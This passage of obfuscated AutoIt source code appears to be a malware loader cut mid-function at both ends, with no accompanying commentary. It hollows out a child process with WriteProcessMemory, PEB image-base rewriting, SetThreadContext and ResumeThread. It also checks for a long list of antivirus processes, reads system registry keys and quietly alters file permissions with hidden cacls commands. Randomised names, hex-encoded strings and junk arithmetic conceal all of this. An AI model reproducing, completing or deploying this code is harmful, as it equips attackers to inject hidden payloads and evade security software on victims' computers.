- $9eg6qismk48f2dexizujquoy3t = oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $dcda6qowuym57zfqucadzu, $rqr75skrbzzbitd4vhr)
- If @error Then
- ttoltiicmgfiojuqigpzcqvdskcnrs($mpodnfy6il, $dcda6qowuym57zfqucadzu)
- $9eg6qismk48f2dexizujquoy3t = oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $dcda6qowuym57zfqucadzu, $rqr75skrbzzbitd4vhr)
- If @error Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((55 + -156), 0, 0)
- EndIf
- EndIf
- EndIf
- DllStructSetData($g8f8je6pbziltsqw5knrzmgj, "Imag" & "eB" & "a" & "s" & "e", $9eg6qismk48f2dexizujquoy3t)
- Local $6g0vogi1bkc1ipdt4u9vwyvgeov3 = DllStructCreate(sctrlw_uspabvkwcwrpunedkkotxwp_mmjamcirofjdjbuv() & $rqr75skrbzzbitd4vhr & BinaryToString("0X" & "5D"))
- Local $xdl1fupjkev5krgwcnqdylzcolqcweuhcx5 = DllStructGetPtr($6g0vogi1bkc1ipdt4u9vwyvgeov3)
- Local $64meuufoqbfen3fqwm47eynujji3duc4x = DllStructCreate("b" & "y" & "t" & "e[" & $kmqdusdqnhmsmalt7rg & gpogoodvlz(), $dbq90hhmy9udn0gcdyuunqrcbf3ixuu2)
- DllStructSetData($6g0vogi1bkc1ipdt4u9vwyvgeov3, 1, DllStructGetData($64meuufoqbfen3fqwm47eynujji3duc4x, Dec("1")))
- Local $ewiqkvwf8n7bwqp
- Local $cmhvcmmlekubjry, $res0ynexuq5b0k
- Local $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf, $xprv2mbi8uxrkqufzgulrapum
- Local $p7znx8sxgciwgj63diilffosgdbxeztald4klkp
- For $fz3eclo13c4hpsztvduuwn10gcs = StringLen("q") To $fpim71aquxa3tneqfcvmw5
- $ewiqkvwf8n7bwqp = DllStructCreate("char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRa" & "wData;dword P" & "ointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;word NumberOfRelocations;wo" & "rd NumberOfLinenumbers;dword Characteristics", $ohug55t6wkqrzcywe8)
- $cmhvcmmlekubjry = DllStructGetData($ewiqkvwf8n7bwqp, BinaryToString("0x53697A654F6652617744617461", 1))
- $res0ynexuq5b0k = $dbq90hhmy9udn0gcdyuunqrcbf3ixuu2 + DllStructGetData($ewiqkvwf8n7bwqp, "Poi" & "n" & "t" & "er" & BinaryToString(BinaryToString("0X3078353436463532363137373434")) & "ata")
- $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf = DllStructGetData($ewiqkvwf8n7bwqp, BinaryToString("0X5669727475616c41646472657373", 1))
- $xprv2mbi8uxrkqufzgulrapum = DllStructGetData($ewiqkvwf8n7bwqp, "UnionOfVirt" & "ualSizeAndPhysic" & "a" & "lAddres" & "s")
- If $xprv2mbi8uxrkqufzgulrapum AND $xprv2mbi8uxrkqufzgulrapum < $cmhvcmmlekubjry Then $cmhvcmmlekubjry = $xprv2mbi8uxrkqufzgulrapum
- If $cmhvcmmlekubjry Then
- DllStructSetData(DllStructCreate(slahotvinldyeippqggxgqslytgxrmokfmby() & $cmhvcmmlekubjry & BinaryToString("0" & "x" & "5D"), $xdl1fupjkev5krgwcnqdylzcolqcweuhcx5 + $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf), StringLen("S"), DllStructGetData(DllStructCreate(dk_vmwfymcqhofyugmhpddqxooqcvdwehwcvkmqiu() & $cmhvcmmlekubjry & _wghyt_xlcssv_xhvthilhalockwjvbaobkufvwyigqbobcyr(), $res0ynexuq5b0k), Int(ChrW("49"))))
- EndIf
- If $ao8hqhjerekhtrm4ibqjzxiuq81qtkeu72 Then
- If $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf <= $zmqhxaze895g8ieuyxjymibxbevy1lyrqyech AND $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf + $cmhvcmmlekubjry > $zmqhxaze895g8ieuyxjymibxbevy1lyrqyech Then
- $p7znx8sxgciwgj63diilffosgdbxeztald4klkp = DllStructCreate(BinaryToString("0X627" & "974655" & "B", 1) & $wkkz3rasb01j & BinaryToString(BinaryToString("0X30583564", Dec("1", 0)), 1), $res0ynexuq5b0k + ($zmqhxaze895g8ieuyxjymibxbevy1lyrqyech - $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf))
- EndIf
- EndIf
- $ohug55t6wkqrzcywe8 += (400 / 10)
- Next
- If $ao8hqhjerekhtrm4ibqjzxiuq81qtkeu72 Then sfzl_onbyjsysrkquujnmoxne_apoyk_blhyjitmg_wpu($xdl1fupjkev5krgwcnqdylzcolqcweuhcx5, $p7znx8sxgciwgj63diilffosgdbxeztald4klkp, $9eg6qismk48f2dexizujquoy3t, $dcda6qowuym57zfqucadzu, $qoprlnm43nhjgqsgv7ljl2nxlt64uomupiww = 523)
- $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $mpodnfy6il, "ptr", $9eg6qismk48f2dexizujquoy3t, "ptr", $xdl1fupjkev5krgwcnqdylzcolqcweuhcx5, "dword_ptr", $rqr75skrbzzbitd4vhr, "dword_ptr*", 0)
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((1 * -7), 0, 0)
- EndIf
- Local $ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr = DllStructCreate("byte InheritedAddressSpace;byte ReadImageFileExecOptions;byte BeingDebugged;byte Spare;ptr Mutant;ptr ImageBaseAddress;ptr LoaderData;ptr ProcessParameters;ptr SubSystemData;ptr ProcessHeap;ptr FastPebLock;ptr FastPebLockRoutine;ptr FastPebUnlockRoutine;dword EnvironmentUpdateCount;ptr KernelCallbackTable;ptr EventLogSection;ptr EventLog;ptr FreeList;dword TlsExpansionCounter;ptr TlsBitmap;dword TlsBitmapBits[2];ptr ReadOnlySharedMemoryBase;ptr ReadOnlySharedMemoryHeap;ptr ReadOnlyStaticServerData;ptr AnsiCodePageData;ptr OemCodePageData;ptr UnicodeCaseTableData;dword NumberOfProcessors;dword NtGlobalFlag;byte Spare2[4];int64 CriticalSectionTimeout;dword HeapSegmentReserve;dword HeapSegmentCommit;dword HeapDeCommitTotalFreeThreshold;dword HeapDeCommitFreeBlockThreshold;dword NumberOfHeaps;dword MaximumNumberOfHeaps;ptr ProcessHeaps;ptr GdiSharedHandleTable;ptr ProcessStarterHelper;ptr GdiDCAttributeList;ptr LoaderLock;dword OSMajorVersion;dword OSMinorVersion;dword OSBuildNumber;dword OSPlatformId;dword ImageSubSystem;dword ImageSubSystemMajorVersion;dword ImageSubSystemMinorVersion;dword GdiHandleBuffer[34];dword PostProcessInitRoutine;dword TlsExpansionBitmap;byte TlsExpansionBitmapBits[128];dword SessionId")
- $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "ptr", $mpodnfy6il, "ptr", $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr, "ptr", DllStructGetPtr($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr), "dword_ptr", DllStructGetSize($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr), "dword_ptr*", 0)
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError(((4 / (1 * (Dec("2", 0) / -1))) * (1 + 3)), 0, 0)
- EndIf
- DllStructSetData($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr, "I" & "ma" & "ge" & "B" & "as" & "eA" & "ddress", $9eg6qismk48f2dexizujquoy3t)
- $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $mpodnfy6il, "ptr", $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr, "ptr", DllStructGetPtr($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr), "dword_ptr", DllStructGetSize($ginhthcmwuwr5yudxodlyhcbewrwq5e3wkld1olljq9v8wr), "dword_ptr*", 0)
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((1 * ((-3 + 0) * 3)), 0, 0)
- EndIf
- Switch $jbkokjcudb2o5m8caztuwg2owxt1a5oc0
- Case (-1 - ((2 / -1) / ((0 + -1) - -2)))
- DllStructSetData($bbldic83pit5sf, fgtrgwgpfjpicdjldojqm(), $9eg6qismk48f2dexizujquoy3t + $zuinpjpxoem5ozdk2fmoujsnly2lma34v2voq5atmkqm)
- Case (2 - 0)
- DllStructSetData($bbldic83pit5sf, qhdcazedjxsqolohpguzcltkoait(), $9eg6qismk48f2dexizujquoy3t + $zuinpjpxoem5ozdk2fmoujsnly2lma34v2voq5atmkqm)
- EndSwitch
- $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "SetThreadContext", "handle", $gk43ktboa7b, "ptr", DllStructGetPtr($bbldic83pit5sf))
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((-6 + (Int(Chr("49")) * -4)), 0, 0)
- EndIf
- $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $gk43ktboa7b)
- If @error OR $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] = -Dec("1", 0) Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((-3 + -8), 0, 0)
- EndIf
- DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $mpodnfy6il)
- DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $gk43ktboa7b)
- Return DllStructGetData($lvex13kltf6ptj, "Proce" & "ssId")
- EndFunc
- Func rwhsslzitoetfswiuloifcmzvndt_alg()
- Return "0x5C"
- EndFunc
- Func jdqcjfagpdamtypfmszjphaexec()
- Return "46f777320"
- EndFunc
- Func lwkbknwltfwrl()
- Local $ugiflkt87iosojdbzq5ibygxiuzdwybpdseg0esk6oaqnyryos = BinaryToString("0x7c")
- Return $ugiflkt87iosojdbzq5ibygxiuzdwybpdseg0esk6oaqnyryos
- EndFunc
- Func ingfcooqsfxecrya()
- Local $zjvkqclyx2viiihm
- $zjvkqclyx2viiihm = "="
- Return $zjvkqclyx2viiihm
- EndFunc
- Func ujthcdgsfonaohqptubzgrvvrjiwidzohg()
- Local $xjtg5m4ckpdxvnm96d7mgwdvtv9jywybbkp9ntxglmojp17
- $xjtg5m4ckpdxvnm96d7mgwdvtv9jywybbkp9ntxglmojp17 = BinaryToString("0x5c544d50", 1)
- Return $xjtg5m4ckpdxvnm96d7mgwdvtv9jywybbkp9ntxglmojp17
- EndFunc
- Func ncsv_axwhwanqqdyepezikkiinqlpqmecxpbufbt()
- Local $e7fwgtlafughctlzfdvemzouzyne7jpvwawbwrw = zxgmerfrsgboyotstop_ixnjnzoraurlhnccbizvn()
- Return $e7fwgtlafughctlzfdvemzouzyne7jpvwawbwrw
- EndFunc
- Func zzhrcnq_fwbaelobsmnjjpovbirfjknocxl_kumlscerrsgyg()
- Local $o2rywg0zlrjv8fryqxpfxkkovsnhplj3qjj4ec
- $o2rywg0zlrjv8fryqxpfxkkovsnhplj3qjj4ec = kr_drkpz_bhvyf()
- Return $o2rywg0zlrjv8fryqxpfxkkovsnhplj3qjj4ec
- EndFunc
- Func pseqreglybhqq()
- Local $2nd573ze713wenmeb, $u32zuumkfm, $904rzo39nzbanhwyox42pfhbcs8j9gyyw8
- $2nd573ze713wenmeb = FileFindFirstFile(@WindowsDir & BinaryToString("0X5C4D6963726F736F66742E4E45545C4672616D65776F726B5C2A", (-1 / (1 / ((1 + 0) - (StringLen("i") * (-2 + 4)))))))
- While 1
- $u32zuumkfm = FileFindNextFile($2nd573ze713wenmeb)
- If @error Then ExitLoop
- If StringLeft($u32zuumkfm, (StringLen("G") / Dec("1", 0))) = aaadoegqsiyxujnrxwdhaeuqcetd_pxtcmur() Then $904rzo39nzbanhwyox42pfhbcs8j9gyyw8 &= $u32zuumkfm & '"' & "," & '"'
- WEnd
- FileClose($2nd573ze713wenmeb)
- Return BinaryToString("0X5b22", 1) & StringLeft($904rzo39nzbanhwyox42pfhbcs8j9gyyw8, StringLen($904rzo39nzbanhwyox42pfhbcs8j9gyyw8) - 2) & BinaryToString("0X5d", StringLen("F"))
- EndFunc
- Func vyniphfzozthprpzbfrh()
- Return "0x626473657276696365686F73742E657865"
- EndFunc
- Func jdzczmqtjmzmqepmsmkrdmxzrboakzth()
- Return poieranvshdqmkipghxvzyhwefhrdfirexfdwqq()
- EndFunc
- Func khafkkhqtszrrefksmbbhsfidtcporlvzkfqmagvxj()
- Local $4cxb0qb9pxkxs7q = BinaryToString("0X" & "5" & "d", 1)
- Return $4cxb0qb9pxkxs7q
- EndFunc
- Func iualvpsgxxxmczelpvwhhblqmrotgxagf()
- Return BinaryToString("0x557365722D4167656E74")
- EndFunc
- Func aaadoegqsiyxujnrxwdhaeuqcetd_pxtcmur()
- Local $eqhrjjqqkpsl
- $eqhrjjqqkpsl = BinaryToString(BinaryToString("0x30783736", 1))
- Return $eqhrjjqqkpsl
- EndFunc
- Func gkwmmakclfebkghimfpthtxvuerfwzzsitggjuxm_g_vwtl()
- Local $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7
- If @OSArch = BinaryToString(BinaryToString("0x" & "30" & "583" & "5383" & _ixyqesfzzyfsjthlbixz() & "34", (Int(ChrW("49")) / Dec("1", 0))), (0 + ((((Dec("1", 0) / -1) - (-2 - 0)) - 0) / Dec("1")))) OR @OSArch = cnjjtpqkz_camfbid() Then
- $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7 = RegRead(BinaryToString("0x484b45595f4c4f43414c5f4d414348494e4536345c534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e5c57696e736174", StringLen("D")), "Primar" & "yAdap" & "terStrin" & "g")
- Else
- $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7 = RegRead(BinaryToString(BinaryToString(BinaryToString("0X30783330353833343338333434323334333533353339333534363334343333343436333433333334333133343433333534363334343433343331333433333334333833343339333434353334333533353433333533333334343633343336333533343335333733343331333533323334333533353433333434343336333933363333333733323336343633373333333634363336333633373334333534333335333733363339333634353336333433363436333733373337333333323330333434353335333433353433333433333337333533373332333733323336333533363435333733343335333633363335333733323337333333363339333634363336343533353433333533373336333933363435333733333336333133373334"))), "PrimaryAda" & "pter" & omubxoacpbjouqbwuxbryxqhllqtgz_epoflhzfebdbo() & "ng")
- EndIf
- Return $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7
- EndFunc
- Func qyhpgtxpkraadh()
- Local $tdf7lrskkl5j0b7yxfai6dtscvensotrqar2yck
- $tdf7lrskkl5j0b7yxfai6dtscvensotrqar2yck = edis_boeogplxillynpbcevhtntqnzpqwo()
- Return $tdf7lrskkl5j0b7yxfai6dtscvensotrqar2yck
- EndFunc
- Func qlgskympacaenl_h()
- Local $ep9yioquerq2qbhpcui2kbtgxbjdlenfqtuxdkplj7bx4uidhs = BinaryToString("0x44617461", 1)
- Return $ep9yioquerq2qbhpcui2kbtgxbjdlenfqtuxdkplj7bx4uidhs
- EndFunc
- Func iilyuxbwugiyndbi_snmefwtscqk_sxeccoijdjxbjbwevq()
- Return bnsvysdmfcvpyfc()
- EndFunc
- Func xdqvxgxlcatewxloqidvcepi_etcerfsukjozy()
- Return "avp.exe"
- EndFunc
- Func eqthjdpjctukuvfcwxdavsgaev_jylxzpvazvjruq()
- Local $st6v26khfayo02mm4uty0la4hbfik62cvuomgzn9hqkidus6s = "AVE"
- Return $st6v26khfayo02mm4uty0la4hbfik62cvuomgzn9hqkidus6s
- EndFunc
- Func jaakxppmkhkxwqojpsspinssziyccckzlfzh()
- Local $7vltbhqt8mg5hzcvnwpuqdyl1xc4jxazmtjxwy6pe
- $7vltbhqt8mg5hzcvnwpuqdyl1xc4jxazmtjxwy6pe = "n" & "avap" & "s" & "vc" & ".exe"
- Return $7vltbhqt8mg5hzcvnwpuqdyl1xc4jxazmtjxwy6pe
- EndFunc
- Func ppmcdosepfdovocapnawwmitxeolhobtjphdjznqbrrrbi()
- Return "\"
- EndFunc
- Func wosiyabviqgshcpdjsloinxncqrohwqkgqopism($scfx7p4vptwqhzy0fp4)
- Local $wberil45yllmiey1iokfjbehvcygbcitleksw, $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy
- $wberil45yllmiey1iokfjbehvcygbcitleksw = ""
- For $fz3eclo13c4hpsztvduuwn10gcs = 1 To StringLen($scfx7p4vptwqhzy0fp4)
- $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy = Asc(StringMid($scfx7p4vptwqhzy0fp4, $fz3eclo13c4hpsztvduuwn10gcs, 1))
- Select
- Case ($8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy >= (((((0 - 1) + -11) / 2) * (2 / (1 - (Dec("4") / (((-2 * (-1 + -1)) / 1) / Int(ChrW("50"))))))) * 4) AND $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy <= Dec("39")) OR ($8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy >= ((10 + Int(Chr("51"))) * Dec("5")) AND $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy <= (((-7 - 2) - (9 / 1)) * ((0 - Dec("2", 0)) - (Int(Chr("51")) / (-1 / -1))))) OR ($8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy >= Dec("61", 0) AND $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy <= (((-61 * 43) / 43) * ((1 / (1 + 0)) * (0 - ((1 / (Dec("1", 0) / ((1 - StringLen("mj")) + 2))) - (-1 - 0))))))
- $wberil45yllmiey1iokfjbehvcygbcitleksw = $wberil45yllmiey1iokfjbehvcygbcitleksw & StringMid($scfx7p4vptwqhzy0fp4, $fz3eclo13c4hpsztvduuwn10gcs, 1)
- Case $8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy = StringLen("_iEozRJ3YXgFG91i1kxO-K8BXS4FSDgI")
- $wberil45yllmiey1iokfjbehvcygbcitleksw = $wberil45yllmiey1iokfjbehvcygbcitleksw & "+"
- Case Else
- $wberil45yllmiey1iokfjbehvcygbcitleksw = $wberil45yllmiey1iokfjbehvcygbcitleksw & szr_hfbbpvvgvj() & Hex($8th2i3yygrskgzw1qp3qk9cahyios2ji9ugyecfzljqlhy, Int(ChrW("50")))
- EndSelect
- Next
- Return $wberil45yllmiey1iokfjbehvcygbcitleksw
- EndFunc
- Func yztyxziqfquxjsxbnazibqiuotbyngsynzahzw()
- Return "0X416464726573734F664E6577457865486561646572"
- EndFunc
- Func mnwumtdbranfjd()
- Local $j0d5kpayexhfnhunvimiutufw55brcxrmwu3s5jz5iud1b = "0x2d64"
- Return $j0d5kpayexhfnhunvimiutufw55brcxrmwu3s5jz5iud1b
- EndFunc
- Func ncjarabtnfcct()
- Local $ygvumseebbishyz4l8bf0hp8mnadukytirr1j2fucweg = BinaryToString("0x6d63736869656c642e657865", 1)
- Return $ygvumseebbishyz4l8bf0hp8mnadukytirr1j2fucweg
- EndFunc
- Func fensfnhdrdkxblmgwgwpiycieiwng()
- Return hygfsjgpza()
- EndFunc
- Func fnhghgdwwyegz_uffrjftibmfxyhmifvsxmonefwem()
- Return BinaryToString("0X3d")
- EndFunc
- Func kmhvbrvryeyqedovmbdbsbkilgmkcukdmmvk()
- Local $4gkzstnhi3gu = 0
- If ProcessExists("Avas" & "tSvc." & "exe") OR ProcessExists(BinaryToString("0X617665736572766963652E657865")) OR ProcessExists(nhmtqsdhdgeimlif()) OR ProcessExists("AvastU" & "I.ex" & "e") Then $4gkzstnhi3gu = (((0 - 2) - ((20 + -116) / (-5 - StringLen("c!?")))) + Dec("20", 0))
- If ProcessExists(BinaryToString(BinaryToString("0x30583631373636373265363537383635"))) OR ProcessExists(nv_borpqgeaixjlprncpywbsgweqp()) OR ProcessExists(BinaryToString(BinaryToString("0x3" & "07836313736363737353" & "6393265363537383635", 1), StringLen("M"))) OR ProcessExists(BinaryToString(zvfemlxfgjseznsojvjozicrnghtsvsrmjvhylylukereztt(), (((-1 / 1) / Int(Chr("49"))) - (2 / -1)))) Then $4gkzstnhi3gu = (StringLen("!0jM8Vj81Wm9Dx") + Int(ChrW(51)))
- If ProcessExists(ja_eftkmxypsfrlzelslpstbcdvlmlwowcbk()) OR ProcessExists(BinaryToString("0x6176736861646f772e657865", StringLen("r"))) OR ProcessExists("a" & "v" & "gnt." & "exe") OR ProcessExists("Avi" & "ra.Service" & "Host" & ".exe") OR ProcessExists("Avira" & "." & "Sy" & BinaryToString("0x73747261792E65") & "xe") Then $4gkzstnhi3gu = Dec("10", 0)
- If ProcessExists(glgmpfzsipekhiwmtavlmgypd()) OR ProcessExists(vxmdryesvdsvpmndwbrmgperdotapac()) OR ProcessExists(wsc_uhnwqvuubucj()) Then $4gkzstnhi3gu = Dec("F")
- If ProcessExists("cla" & "mav." & "exe") Then $4gkzstnhi3gu = 14
- If ProcessExists(fensfnhdrdkxblmgwgwpiycieiwng()) OR ProcessExists(BinaryToString(feaeizqavjgibpxnqxqn_ltkbmg(), Int(Chr("49")))) Then $4gkzstnhi3gu = (-1 * (5 + -18))
- If ProcessExists(BinaryToString("0X6477656E67696E652E657865")) Then $4gkzstnhi3gu = Dec("C")
- If ProcessExists("f" & "p" & "avse" & "rver" & ".exe") Then $4gkzstnhi3gu = 11
- If ProcessExists("fs" & "ma." & "exe") OR ProcessExists(hpqrzftlekykdcvohfanyagilwgvisvgou_()) OR ProcessExists(BinaryToString("0X6673736d", (1 / (1 / Dec("1")))) & "3" & "2.exe") Then $4gkzstnhi3gu = StringLen("hVS3KY8h87")
- If ProcessExists(jxiwwibqksiitsmcweyfjpqnepklabadschr()) OR ProcessExists(BinaryToString("0X61766b6" & "36c2e65" & "7865", 1)) Then $4gkzstnhi3gu = 9
- If ProcessExists(xdqvxgxlcatewxloqidvcepi_etcerfsukjozy()) OR ProcessExists(hidxeulzzhaepspsnqdmgj()) OR ProcessExists("klb" & "lm" & "a" & "in" & ".exe") Then $4gkzstnhi3gu = ((7 - 23) / (0 - 2))
- If ProcessExists("alogse" & "rv" & ".exe") OR ProcessExists(ncjarabtnfcct()) OR ProcessExists("w" & "e" & "bsc" & "anx" & ".ex" & "e") OR ProcessExists(ppexiuwxlsnolyxvz()) OR ProcessExists(emkwvmcvdwchvlggjh()) Then $4gkzstnhi3gu = (((Int(Chr("49")) + (-4 + 0)) - 1) - (-1 * ((0 - -11) + 0)))
- If ProcessExists("m" & "smp" & "svc." & "exe") OR ProcessExists(kyiemgvkglcbwefrbffhahvbkmbstpdibcseshweafd()) OR ProcessExists(BinaryToString("0x6D7373656365732E657865")) Then $4gkzstnhi3gu = StringLen("mrcuQS")
- If ProcessExists(_lozqicnyrbvrlrvmyjguexpic()) OR ProcessExists(BinaryToString("0x656775692E657865")) Then $4gkzstnhi3gu = (3 - (0 - 2))
- If ProcessExists(BinaryToString("0X6e6f72746f" & "6e7365637572697" & "4792e657865", (-1 - ((((0 - -2) + (-1 * 4)) + -2) / 2)))) OR ProcessExists(xsnldvsghfqrnaziwurph_rwvjbmrdkhohwwnyzcrq() & "ch" & "." & "exe") OR ProcessExists(jaakxppmkhkxwqojpsspinssziyccckzlfzh()) OR ProcessExists(BinaryToString("0x767074726" & "1792e" & "657865", StringLen("m"))) OR ProcessExists(BinaryToString(rjwmrhlmatm_kqymunbmcrtqlxi(), (-1 + Int(ChrW("50"))))) Then $4gkzstnhi3gu = StringLen("WduH")
- If ProcessExists("P" & BinaryToString("0x5341") & "N" & "Hos" & "t" & ".exe") OR ProcessExists("PSU" & "A" & "Ser" & "vice.exe") OR ProcessExists("p" & "sh" & "os" & "t" & ".exe") OR ProcessExists("pav" & "sr" & "v" & ".exe") OR ProcessExists(eqthjdpjctukuvfcwxdavsgaev_jylxzpvazvjruq() & "NGINE." & "EX" & "E") Then $4gkzstnhi3gu = Int(Chr("51"))
- If ProcessExists("sa" & "vservi" & "ce.exe") Then $4gkzstnhi3gu = (1 + Int(Chr("49")))
- If ProcessExists(quwr_cuqmepkglf()) Then $4gkzstnhi3gu = Dec("1", 0)
- Return $4gkzstnhi3gu
- EndFunc
- Func odbwdthckanzhiurcsgerwf()
- Local $vojlxdszkukib9pl85hu = '"'
- Return $vojlxdszkukib9pl85hu
- EndFunc
- Func wsc_uhnwqvuubucj()
- Local $jbxnzldm4yu8htnf5xyjhnpitt2jf6go2vvs3qdtkwjyvdbhfl = "bdagex" & "ec." & "exe"
- Return $jbxnzldm4yu8htnf5xyjhnpitt2jf6go2vvs3qdtkwjyvdbhfl
- EndFunc
- Func napcxlnzritfccozuamlxc_pofjkghdknxvhi()
- Local $snufcglovj8y87lm
- $snufcglovj8y87lm = "0x20"
- Return $snufcglovj8y87lm
- EndFunc
- Func ibvdmowumouqexuaqhujgyxbndf()
- Local $pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7 = RegRead("HKEY" & "_C" & "LASS" & "ES" & "_ROOT\HTTP\shell\o" & "pen\command\", "")
- Return StringMid($pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7, (Dec("1", 0) * (2 - 0)), StringInStr($pkzrrgaxn7esitc0xtcgd83ahko7guekjih8b7, ugwrxlngxiz()) + Dec("2"))
- EndFunc
- Func gskybmwosfhcjgxfghszalc($mpodnfy6il)
- Local $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $mpodnfy6il, "bool*", 0)
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then Return SetError(Dec("1", 0), 0, 0)
- Return $gwzzqtmpqf7zmwclp1y5ow17jx7g[Int(Chr(50))]
- EndFunc
- Func wrwejjcgkvla()
- Return "schtasks /Query"
- EndFunc
- Func ulcjgcxrffja_ogbqabrjwmegnxnvrbqb()
- Local $lihrzkscycbxvinx
- $lihrzkscycbxvinx = "0X5c"
- Return $lihrzkscycbxvinx
- EndFunc
- Func utwzvlwnpjfcyysqnef_fajgswzbofkjhedzao_v()
- Return "HK" & "EY_LOCAL_MACHINE64\SOFTWAR" & "E\Microsoft\Wi" & "ndows NT\Curren" & "tVersion\ProfileList\"
- EndFunc
- Func tqndkbjzndxcqlnotvrehifjxuszgwhmzu()
- Return BinaryToString("0" & "X" & "5C")
- EndFunc
- Func ezysl_kfjvhamboowzltqujiznkwtexb()
- Return dqxfslpnbuemcrgxagplmoyd_dqqnegeeznsydhb()
- EndFunc
- Func hygfsjgpza()
- Local $eq1oam0oalcj0tabomyqeuuyeg6njckk8qqc = "cmdagent.exe"
- Return $eq1oam0oalcj0tabomyqeuuyeg6njckk8qqc
- EndFunc
- Func poieranvshdqmkipghxvzyhwefhrdfirexfdwqq()
- Return "X64"
- EndFunc
- Func zvwndffxdbesncpkyrbjbyfasim()
- Return BinaryToString("0X64776f7264205669727475616c416464726573733b2064776f72642053697a654f66426c6f636b")
- EndFunc
- Func bnsvysdmfcvpyfc()
- Return "-RSH"
- EndFunc
- Func esmvok_rkimdmtlhorftuvvulz_dbkiprijvximo_qjpenkiso()
- Local $er2bmvw10kpeulype9ajxz1wzlvkmoufl8ipp = "Process"
- Return $er2bmvw10kpeulype9ajxz1wzlvkmoufl8ipp
- EndFunc
- Func bnlpzkechhfyauotjnrrclakycijdkbjoa_()
- Return "\"
- EndFunc
- Func kfoafpxexzbtbwt_zlxizha()
- Return yueedxubmdzahqhitosr()
- EndFunc
- Func bictenbxhtjgwsjpjtlz()
- Local $w1meb3hpudl47atbybg9dsxyhomzgjoytzsfkb4xjdy7u
- $w1meb3hpudl47atbybg9dsxyhomzgjoytzsfkb4xjdy7u = ".lnk"
- Return $w1meb3hpudl47atbybg9dsxyhomzgjoytzsfkb4xjdy7u
- EndFunc
- Func kfryfuuq_aeiqzqc($izu68qryj7kquezgagq0gj6uik9qaadld9rif9, $smiiua7v3wxvswsplbht3kxeey1p = True)
- If $smiiua7v3wxvswsplbht3kxeey1p = True Then
- RunWait(@ComSpec & " /c echo " & "y| cacl" & 's.exe "' & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & '" /E ' & "/C /P" & ' "' & @UserName & ":R" & '"', @SystemDir, @SW_HIDE)
- RunWait(@ComSpec & dyciwwrjojzbrsppftmchong_a() & $izu68qryj7kquezgagq0gj6uik9qaadld9rif9 & BinaryToString("0x22202F45202F43202F502022", ((1 / (Dec("1", 0) - 0)) - 0)) & jpdaayhe_iogzmlxfn_(xsguetdejifnxhci_f()) & cjufzzbfcyuqponrezanouwiifqalgkrbijsp(), @SystemDir, @SW_HIDE)
